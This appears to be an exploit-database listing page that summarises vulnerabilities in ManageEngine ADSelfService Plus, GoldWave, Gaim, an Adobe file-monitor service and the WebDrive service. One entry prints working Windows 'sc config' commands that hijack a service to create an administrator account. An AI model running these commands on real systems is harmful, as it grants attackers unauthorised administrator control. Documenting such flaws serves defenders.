Explore Vulnerabilities

Explore all Exploits:

ManageEngine ADSelfService Plus - Unauthenticated Remote Code Execution Vulnerability

A vulnerability in ManageEngine ADSelfService Plus could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. The vulnerability exists due to insufficient validation of user-supplied data. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted system. A successful exploit could allow the attacker to execute arbitrary code on the system with the privileges of the web server process.

GoldWave 5.70 - Buffer Overflow (SEH Unicode)

GoldWave 5.70 is vulnerable to a buffer overflow vulnerability when a specially crafted file is opened. This can be exploited to execute arbitrary code by corrupting the SEH chain and overwriting the return address with a pointer to the malicious code. The vulnerability is triggered when a user opens a specially crafted file with the application.

Gaim 1.2.1 Stack Overflow Vulnerability

This code demonstrates a stack overflow vulnerability in Gaim 1.2.1 when processing email addresses. It causes a segfault when executing the /vuln command in a conversation. If a protocol allows a 10002-character message to go through, it also segfaults the recipient. The vulnerability is due to the stack being overwritten with 'A's and the return address of the function being set to 0x41414141.

Local Privilege Escalation

To exploit this issue, attackers require local, interactive access to an affected computer. The following example commands are available:

    sc stop "AdobeActiveFileMonitor8.0"
    sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
    sc start "AdobeActiveFileMonitor8.0"
    runas /noprofile /user:%COMPUTERNAME%\adobe cmd

South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges

The 'WebDrive Service' is installed with an empty security descriptor. A malicious user can stop the service, then invoke the 'sc config' command to replace the binary path with a value of choice, then restart the service to run the command with SYSTEM privileges.

Recent Exploits: